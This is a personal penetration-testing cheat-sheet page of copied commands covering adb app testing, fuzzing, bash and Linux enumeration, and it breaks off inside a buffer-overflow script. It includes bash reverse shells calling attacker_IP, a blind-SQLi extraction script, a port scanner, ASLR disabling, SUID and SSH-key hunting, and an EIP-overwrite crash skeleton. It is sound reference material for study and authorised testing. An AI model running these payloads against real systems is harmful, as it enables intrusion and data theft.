muemmelmoehre's security grimoire
Welcome to @muemmelmoehre’s online grimoire / cheat-sheet for useful commands and code snippets. Enjoy!
(Awesome ASCII art like the one below can be found here.)
.-~~~~~~~~~-._ _.-~~~~~~~~~-.
__.' ~. .~ `.__
.'// \./ \\`.
.'// | \\`.
.'// .-~"""""""~~~~-._ | _,-~~~~"""""""~-. \\`.
.'//.-" `-. | .-' "-.\\`.
.'//______.============-.. \ | / ..-============.______\\`.
.'______________________________\|/______________________________`.
If you’re looking for my write-ups, please head over to my GitHub page!
# check for vulnerable services
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# list devices
adb devices
adb devices -l
# launch shell on emulator
adb shell
# launch shell in specific app context
adb shell
run-as package_name_here
# show installed packages
adb shell pm list packages
pm list packages
# return path to app's files
adb shell pm path package_name_here
pm path package_name_here
# start activity and perform action
adb shell am start -a action_name_here -n package_name_here/activity_name_here
am start -a action_name_here -n package_name_here/activity_name_here
# start activity/launch app via adb
## get activity name from AndroidManifest.xml
## launch app
adb shell am start -n com.package.name/com.package.name.activity_name_here
# start activity and perform action with data
adb shell am start -a action_name_here -n package_name_here/activity_name_here -d URI_to_data_here
am start -a action_name_here -n package_name_here/activity_name_here -d URI_to_data_here
# start service
adb shell am startservice -n package_name_here/service_name_here -e "extra_key_here" "extra_value_here"
am startservice -n package_name_here/service_name_here -e "extra_key_here" "extra_value_here"
# send broadcast
adb shell am broadcast -a action_name_here -e "extra_key_here" "extra_value_here"
am broadcast -a action_name_here -e "extra_key_here" "extra_value_here"
# send keystroke to device
input text_here / key_event_here
# transfer files
## copy file from local machine to device
adb pull /path/to/file/on/device /path/to/file/on/pc
## copy file from device to local machine
adb push /path/to/file/on/pc /path/to/file/on/device
# install apk on device
adb install /path/tp/apk
# uninstall app
adb uninstall app_name_here
# exit persistent shell
exit
# print help
adb help
# explicitely choose device
adb -s emulator_serial_number_here command_here
# print device log
adb shell logcat
logcat
# print log help
logcat --help
# query database content
adb shell content query --uri content://uri_here
content query --uri content://uri_here
# query database for specific entry
adb shell content query --uri content://uri_here --where "some_column_name='some_value_here'"
content query --uri content://uri_here --where "some_column_name='some_value_here'"
# query database for all values in column_name_here
adb shell content query --uri content://uri_here --projection column_name_here
content query --uri content://uri_here --projection column_name_here
# insert new entry in database; type : e.g. s = string, i = int
adb shell content insert --uri content://uri_here --bind column_name_here:type_here:value_here --bind another_column_name_here:type_here:value_here
content insert --uri content://uri_here --bind column_name_here:type_here:value_here --bind another_column_name_here:type_here:value_here
# update database entry
adb shell content update --uri content://uri_here --bind column_name_here:type_here:value_here --where "some_column_name='some_value_here'"
content update --uri content://uri_here --bind column_name_here:type_here:value_here --where "some_column_name='some_value_here'"
# check for custom permissions
cat AndroidManifest.xml | grep "<permission" | wc -l # if <0, no custom permissions are defined
# find strings
find disassembled_app_here -name strings.xml | grep '/values/'
# pull apk from device
## find path
adb shell pm path app.name
## pull apk
adb pull /data/app/path/here.apk
# get app backup
(use app and generate data)
## create backup
adb backup my.app.com
## add magic bytes to convert backup file into regular zip
(print "\x1f\x8b\x08\x00\x00\x00\x00\x00",tail -c +25 backup_here.ab) | tar xfvz
# compile binary with afl-clang-fast
export LLVM_CONFIG="llvm-config-11"
CC=/path/to/AFLplusplus/afl-clang-fast CXX=/path/to/AFLplusplus/afl-clang-fast++ ./configure --prefix="/path/to/work/folder/install"
cd /path/to/program/folder
make # might need to run twice
make install # might need to run twice
# fuzz binary
afl-fuzz -i /path/to/corpus/files/ -o /path/to/out/folder/ -s hardcoded_seed_here -- /path/to/afl_compiled_binary_here @@ /path/to/work/folder
# subdomain enumeration
/path/to/amass enum -d domain_here > outfile_here
# subdomain enumeration with API keys in config_file
/path/to/amass enum -d domain_here -config /path/to/config_file_here > outfile_here
# discover targets via ASN
/path/to/amass intel -asn ASN_here
# start service
sudo systemcctl start apache2
# stop service
sudo systemctl stop apache2
# start service at boot time
sudo systemctl enable apache2
# disable service start at boot time
sudo systemctl disable apache2
# check for running service
sudo ss -plant | grep apache2
# read out first line of file via error message
sudo apache2 -f /path/to/file/here
# spin up testing server (ubuntu)
## install apache
sudo apt install apache2
## install php
sudo apt install php_version_here-cli
## enable php execution
sudo apt-get install php libapache2-mod-php
sudo a2enmod mpm_prefork && sudo a2enmod php_version_here
## restart apache2
sudo service apache2 restart
# decode/disassemble apk
apktool d /path/to/apk
apktool d /path/to/apk -o path/to/outfolder
# build app from smali
apktool b /path/to/appfolder
apktool b /path/to/appfolder -o app_here.apk
# search for package in cached database
apt-cache search package_here
# search for package
apt search package_here
# show package description
apt show package_here
# purge package
apt remove --purge package_here
# check whether ASLR is enabled
## 0 = disabled
## 1 = enabled
## 2 = enabled (full randomization, default)
cat /proc/sys/kernel/randomize_va_space
sysctl -a --pattern randomize
# disable ASLR
sysctl -w kernel.randomize_va_space=0 # non persistent
echo 0 > /proc/sys/kernel/randomize_va_space # persistant
# specify field delimiter + output text
awk -F "delimiter_here" '{print $no_element_here}'
# extract 1st + 3rd element, fields delimited by "::"
echo "some::stuff::here" | awk -F "::" '{print $1, $3}'
# download file from FTP / HTTP(S) with X simultaneous connections
axel -a -n X -o /path/to/outfile url_here
# plain
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
# bash
badchars=(
\\x01 \\x02 \\x03 \\x04 \\x05 \\x06 \\x07 \\x08 \\x09 \\x0a \\x0b \\x0c \\x0d \\x0e \\x0f \\x10
\\x11 \\x12 \\x13 \\x14 \\x15 \\x16 \\x17 \\x18 \\x19 \\x1a \\x1b \\x1c \\x1d \\x1e \\x1f \\x20
\\x21 \\x22 \\x23 \\x24 \\x25 \\x26 \\x27 \\x28 \\x29 \\x2a \\x2b \\x2c \\x2d \\x2e \\x2f \\x30
\\x31 \\x32 \\x33 \\x34 \\x35 \\x36 \\x37 \\x38 \\x39 \\x3a \\x3b \\x3c \\x3d \\x3e \\x3f \\x40
\\x41 \\x42 \\x43 \\x44 \\x45 \\x46 \\x47 \\x48 \\x49 \\x4a \\x4b \\x4c \\x4d \\x4e \\x4f \\x50
\\x51 \\x52 \\x53 \\x54 \\x55 \\x56 \\x57 \\x58 \\x59 \\x5a \\x5b \\x5c \\x5d \\x5e \\x5f \\x60
\\x61 \\x62 \\x63 \\x64 \\x65 \\x66 \\x67 \\x68 \\x69 \\x6a \\x6b \\x6c \\x6d \\x6e \\x6f \\x70
\\x71 \\x72 \\x73 \\x74 \\x75 \\x76 \\x77 \\x78 \\x79 \\x7a \\x7b \\x7c \\x7d \\x7e \\x7f \\x80
\\x81 \\x82 \\x83 \\x84 \\x85 \\x86 \\x87 \\x88 \\x89 \\x8a \\x8b \\x8c \\x8d \\x8e \\x8f \\x90
\\x91 \\x92 \\x93 \\x94 \\x95 \\x96 \\x97 \\x98 \\x99 \\x9a \\x9b \\x9c \\x9d \\x9e \\x9f \\xa0
\\xa1 \\xa2 \\xa3 \\xa4 \\xa5 \\xa6 \\xa7 \\xa8 \\xa9 \\xaa \\xab \\xac \\xad \\xae \\xaf \\xb0
\\xb1 \\xb2 \\xb3 \\xb4 \\xb5 \\xb6 \\xb7 \\xb8 \\xb9 \\xba \\xbb \\xbc \\xbd \\xbe \\xbf \\xc0
\\xc1 \\xc2 \\xc3 \\xc4 \\xc5 \\xc6 \\xc7 \\xc8 \\xc9 \\xca \\xcb \\xcc \\xcd \\xce \\xcf \\xd0
\\xd1 \\xd2 \\xd3 \\xd4 \\xd5 \\xd6 \\xd7 \\xd8 \\xd9 \\xda \\xdb \\xdc \\xdd \\xde \\xdf \\xe0
\\xe1 \\xe2 \\xe3 \\xe4 \\xe5 \\xe6 \\xe7 \\xe8 \\xe9 \\xea \\xeb \\xec \\xed \\xee \\xef \\xf0
\\xf1 \\xf2 \\xf3 \\xf4 \\xf5 \\xf6 \\xf7 \\xf8 \\xf9 \\xfa \\xfb \\xfc \\xfd \\xfe \\xff
)
# C
char badchars[] =
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff";
# PHP
$badchars =
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" +
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" +
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" +
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" +
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" +
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" +
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" +
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" +
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" +
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" +
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" +
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" +
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" +
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff";
# PY2
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# PY3
badchars = b"\x01\x02\x03\x04\x05\x06\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# concatenate strings
a="hello"
b="world"
c="${a} ${b}!"
echo $c
# add ! at the end of each line in wordlist
for i in $(cat wordlist.txt); do echo $i; echo ${i}\!; done > tmp
mv tmp wordlist.txt
# for loop from x to z, incrementing in steps of y
for i in $(seq x y z); do command_here; done
# do something for each line in file
for line in $(cat file_here); do command_here arg_here_with_$line; done
# while loop
while [ condition ]; do command_here; other_command_here; done
# conditional statements
if [ some_condition ]; then
command_here
elif[ some_other_condition ]; then
other_command_here
else
some_other_command_here
fi
# function (no need to specify args!)
function function_name_here {
some_command_here
}
function_name_here() {
some_command_here
}
# function call
function_name_here
# function call with args
function_name_here some_arg_here
# evaluate some_other_command before some_command and include the result
some_command `some_other_command with_args`
some_command $(some_other_command with_args)
# chain commands - only execute second if first successful
first_command && second_command
# chain commands - pipe output of first into second
first_command | second_command
# show variable's value
echo $VARIABLE_HERE
# increment value
((value++))
# decrement value
((value--))
# data streams
## send from
<
## write to
>
## append to
>>
# send STDERR (2) to log file
some_command_here 2> error.log
# run bash with debug output
#!/bin/bash -x
# run SUID bash without dropping privs (run with euid)
/bin/bash -p
# capture user input + display
read variable_name_here
echo $variable_name_here
# capture user input with prompt
read -p 'prompt_here: ' variable_name_here
# silently capture user input
read -sp 'prompt_here: ' variable_name_here
# conditions
## not
!
## and
&&
## or
||
## equal
=
-eq
## not equal
!=
-ne
## greater than
-gt
## greater than or equal
-ge
## less than
-lt
## less than or equal
-le
## file exists
-e file_name_here
## directory exists
-d file_name_here
## file exists + not empty
-s file_name_here
## file exists with read permission
-r file_name_here
## file exists with write permission
-w file_name_here
## file exists with execute permission
-x file_name_here
## test for empty string
### empty
-z string_here
### length > 0
-n string_here
# exit status (0 = succes, else failure)
return some_value_here
# reverse shell
bash -i >& /dev/tcp/attacker_IP/port_here 0>&1
0<&1;exec 1<>/dev/tcp/attacker_IP/port_here; bash <&1 >&1 2>&1
bash -c 'bash -i >& /dev/tcp/attacker_IP/port_here 0>&1'
# fix TTY
## background reverse shell
Ctrl-Z
## find tty values on attacker's box
echo $TERM
stty -a
## fix TTY + foreground reverse shell again
stty raw -echo && fg
## back in reverse shell
reset
export SHELL=bash
export TERM=term_value_here
stty rows no_rows_here columns no_columns_here
# stabilize shell
/usr/bin/script -qc /bin/bash /dev/null
/bin/sh -i
/bin/bash -i
# scan
host=target_IP_here; echo "--- scan starting ---"; for port in {1..65535}; do timeout .1 bash -c "echo >/dev/tcp/$host/$port" && echo "port $port is open"; done; echo "--- scan finished ---"
# web injection script (e.g. blind SQLi)
## !! works only for queries with 1 result !!
## --> limit 0,1 in payload
## e.g. payload: "select concat(user, '-', pass) from accounts limit 0,1
#!/bin/bash
charset=`echo {0..9} {A..Z} \. \: \; \- \_ \@`
export target="https://vuln_url_here"
export trueresp="response_when_true_here"
export maxlength=$1 # take 1st cli arg, maxlength of output
export payload=$2 # take 2nd cli arg, payload
export result=""
echo "[*] Extracting results for $payload"
for ((j=1;j<$maxlength;j+=1))
do
export nthchar=$j
for i in $charset
do
wget "$target?param_here=wurzelsepp' and substring(($payload),$nthchar,1)='$i" -q -O | grep "$trueresp" &> /dev/null
if [ "$?" == "0" ]
then
echo "[+] Character number $nthchar found: $i"
export result+=$i
break
fi
done
done
echo "Result: " $result
# add new user
sudo adduser user_name_here
# create alias in .bash_profile
alias alias_name_here="command_to_run_here"
source ~/.bash_profile
# list defined aliases
alias
# delete alias
unalias alias_here
# display arp entries
arp -a
# background process / job
Ctrl+Z + bg
some_command_here &
# base64 encode + disable line wrapping / print everything on the same line
base64 -w 0 file_here
some_command_here | base64 -w 0
# base64 encode string
echo -n string_here | base64
cat file_name_here | base64
# base64 decode string
echo -n b64_string_here | base64 -d
echo -n b64_string_here | base64 -d >> file_name_here
# pack command for transport
echo 'command && -stuff here' | base64
# unpack command to file on target
echo 'base64_here' > /tmp/my_script.sh
echo '2nd_base64_here' >> /tmp/my_script.sh
# echo new line
echo -e "\n"
printf "\n"
# find all files with capabilities
getcap -r / 2>/dev/null
# set setuid capability
setcap cap_setuid+ep /path/to/file
# remove all capabilities from file
setcap -r /path/to/file
# read all files in . + grep for search_term
cat *|grep search_term
# read all files in . + grep for search_term (case-insensitive)
cat *|grep -i search_term
# read all files in . + grep out search_term
cat *|grep -v search_term
# read all files in . + grep for lines starting with search_term
cat *|grep ^search_term
# read all files in . + grep for lines ending with search_term
cat *|grep search_term$
# show real, effective, saved, file system UID / GID
cat /proc/$$/status | grep "[UG]id"
# change permissions for folder + subfolders
chmod value_here -R /path/to/folder
# change default shell (effective after login)
chsh -s /path/to/shell
chsh -s /path/to/shell username_here
# compare files : 1-unique to 1st file, 2-unique to 2nd file 3-both
comm file1_here file2_here
# compare and only show lines unique to 2nd file
comm -13 file1_here file2_here
# copy file attributes (e.g. SUID bit)
cp --attributes-only --preserve=all /path/to/copy/from/binary /path/to/copy/to/binary
# show cron jobs
crontab -l
ls -la /etc/ | grep cron
ls -lah /var/spool/cron
ls -la /etc/cron*
cat /etc/cron*
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
# edit crontab
crontab -e
# edit crontab for different user
crontab -u user_name_here -e
# time stamp year-month-date_hh:min
date +%F_%R
# compare files : --unique to 1st file, +-unique to 2nd file
diff -c file1_here file2_here
diff -u file1_here file2_here
# output previous return value
echo $?
# show PID of current shell
echo $$
# foreground process / job
fg
fg %job_no_here
fg %command_name_here
fg %PID_here
# foreground previous job
fg %-
# foreground current job
fg %+
fg %%
# list every file with SUID bit set
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -4000 -type f 2>/dev/null
find / -perm -u+s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# list every file with SGID bit set
find / -perm -g=s -type f 2>/dev/null
# find files with SUID / SGID bit set
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
# find ssh keys
find ~/ /root /home -maxdepth 2 -name '\.ssh'
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find
# find files not owned by root
find \! -uid 0
# find all readable files in /folder_here
find /folder_here -maxdepth 1 -readable -type f
# find all writable files in /folder_here
find /folder_here -maxdepth 1 -writable -type f
# find all writable directories
find / -executable -writable -type d 2> /dev/null
# list files recursively
find /path/to/search/folder -type f
# find files with specific extension
find /path/to/search/folder -name "*.extension_here"
# find file (systemwide search)
find / -name "file_name_here"
# print path to file
find . -name file_name_here
# find config files
find . | grep config
# find files older than x days
find /path/to/search/folder/ -mtime +x
# cat all files in folder_here
find folder_here -type f -exec cat {} \;
find folder_here -type f -exec cat {} +
# exclude error messages from output
find / -name "file_name_here" 2>/dev/null
# enable hot corners on ubuntu
gsettings set org.gnome.desktop.interface enable-hot-corners true
# show bash history
history
# clear bash history
history -c
# show IP
ip a
hostname -I
ifconfig
# show routing table
ip r
# list running jobs
jobs
# use command from history
!line_no_here
# repeat last command
!!
# kill process
kill PID_here
# show program's shared object dependencies
ldd /full/path/to/program/here
# link binary (use without full path)
sudo ln -s /path/to/binary /usr/bin/binary_name_here
# search file in locate.db
locate file_here
# update locate.db
sudo updatedb
# display files on single line
ls -a1
# display files in chronological order
ls -lt
# display folder content recursively
ls -lasR
# display loaded modules
lsmod
# man keyword search
man -k keyword_here
man -k 'regex_here'
apropos keyword_here
# read specific section of man page
man section_no_here man_page_here
# calculate MD5 sum of string
echo -n "my awesome string here" | md5sum
# calculate MD5 sum of file
md5sum file_name_here
# create directory + all required parent directories
mkdir -p parent_here/folder_name_here
# create directories + all required parent directories
mkdir -p parent_here/{folder1,folder2,folder3}
# generate Linux user password
mkpasswd -m sha-512 new_password_here
# recursively check file permissiona
namei -l /path/to/check/
# set systemwide DNS
sudo nano /etc/resolv.conf
#nameserver 127.0.0.53 # only comment out, do not delete
nameserver DNS_IP_here
# enumerate shares
nmblookup -A IP_here
# keep process running after logout
nohup command_here
## check back on command after next login
tail -f nohup.out # ctrl+c to quit
# import client certificate
## extract .pem
openssl pkc12 -in certificate_name_here.pfx -nocerts -out certificate_name_here.pem -nodes
## extract .crt
openssl pkcs12 -in certificate_name_here.pfx -nokeys -out certificate_name_here.crt -nodes
## copy to /usr/local/share/ca-certificates/
sudo cp certificate_name_here.crt /usr/local/share/ca-certificates/certificate_name_here.crt
## update
sudo update-ca-certificates
# check for GUI
pidof X
# ping host
ping -c 1 IP_here
# list running processes
ps
ps -ef
# list specific process
ps -fC process_name_here
# list processes running as root
ps aux | grep "^root”
ps aux | grep "root$”
# terminal logging
script /path/to/log
exit
# sort text file in alphabetical order + remove duplicates
sort -u file_name_here
# reload .bashrc / .bash_profile
source ~/.bashrc
source ~/.bash_profile
# run shell (user's shell in /etc/passwd) as login shell
sudo -i
sudo --login
# list sudo-allowed programs
sudo -l
sudo --list
# run shell (SHELL env variable or user's shell in /etc/passwd)
sudo -s
sudo --shell
# run program as another user
sudo -u other_user_here program_here
sudo --user other_user_here program_here
# reload .profile
source ~/.profile
# continously show last lines from text file
tail -f /path/to/file
# output last X lines from file
tail -nX /path/to/file
# print last line, second to last, etc. line
tail -1
tail -2
# untar .tar.gz
tar -xvzf tarball_here
# untar .tar.gz to specific location
tar -C /path/to/destination -xvzf tarball_here
# unzip .tar.bz2
tar -xf tarball_here
# display kernel version
uname -a
uname -mrs
cat /proc/version
# display OS / distro version
cat /etc/issue
cat /etc/*-release
cat /etc/os-release
cat /usr/lib/os-release
cat /etc/system-release
cat /etc/redhat-release
cat /etc/centos-release
lsb_release -d
rpm -q centos-release
dmesg | grep Linux
ls /boot | grep vmlinuz-
# show number of occurrences
uniq -c
# update locate's file name database
updatedb
# delete user + their files
sudo userdel -r user_name_here
# add user to group
sudo usermod -a -G group_name_here user_name_here
# list logged-in users
w
# run command every X seconds (default : 2)
watch -n X command_here
# number of words in text file
wc -w file_name_here
# number of lines in text file
wc -l file_name_here
# number of charcters in text file
wc -m file_name_here
# number of bytes in text file
wc -c file_name_here
# locate program
whereis program_name_here
# find file in $PATH directories
which file_name_here
# launch binary
START binary_name_here.exe
# keep prompt open
PAUSE
# don't show executed commands
@ECHO OFF
# direct EIP overwrite - WIN
## crash application
### PY2
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
buffer = "A" * 1000 # CHANGE THIS (increment buffer size until crash)
print "[+] Sending buffer..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target_IP, target_port))
s.recv(1024) # receive banner etc., adapt if needed
s.send(buffer + '\r\n') # send buffer
s.close()
print "[+] Exploit completed!"
## determine EIP offset
### create pattern
msf-pattern_create -l 1000
### plug pattern as buffer
#!/usr/bin/env python
import socket
import os
import sys
target_IP = 'victim_IP_here' # CHANGE THIS
target_port = victim_port_here # CHANGE THIS
